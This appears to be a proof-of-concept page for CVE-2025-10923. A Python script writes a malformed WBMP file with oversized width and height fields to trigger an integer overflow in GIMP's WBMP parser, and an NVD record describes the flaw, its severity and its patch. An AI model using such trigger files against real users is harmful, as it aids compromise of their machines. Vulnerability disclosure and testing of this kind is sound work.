CVE-2025-10923

import struct def create_malicious_wbmp(): """ Generate a malicious WBMP file to trigger CVE-2025-10923 Integer overflow in WBMP file parsing in GIMP """ # WBMP Type 0 header wbmp_data = bytearray() # WBMP file header wbmp_data.append(0x00) # WBMP Type wbmp_data.append(0x00) # FixHeaderField # Trigger integer overflow with large width value # Using value that will overflow when multiplied large_width = 0xFFFFFFFF # Encode var-length integer (WBMP uses this encoding) # This creates an oversized value that can cause integer overflow width_encoded = bytes([0xFE, 0xFF, 0xFF, 0xFF, 0x0F]) height_encoded = bytes([0xFE, 0xFF, 0xFF, 0xFF, 0x0F]) wbmp_data.extend(width_encoded) wbmp_data.extend(height_encoded) # Add minimal image data wbmp_data.append(0x00) with open('CVE-2025-10923_poc.wbmp', 'wb') as f: f.write(wbmp_data) print("Malicious WBMP file created: CVE-2025-10923_poc.wbmp") print("Open this file with GIMP to trigger the vulnerability") if __name__ == '__main__': create_malicious_wbmp()

{"cve": {"id": "CVE-2025-10923", "sourceIdentifier": "[email protected]", "published": "2025-10-29T20:15:35.050", "lastModified": "2025-11-04T13:14:27.657", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GIMP WBMP File Parsing Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of WBMP files. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before allocating a buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27878."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gimp:gimp:3.0.4:*:*:*:*:*:*:*", "matchCriteriaId": "103D75C8-35B7-4E50-B75C-2D75294CB7AC"}]}]}], "references": [{"url": "https://gitlab.gnome.org/GNOME/gimp/-/commit/2d2d39f3da1d0b01ca7d71ad2b7a8725ee92ed96", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-912/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}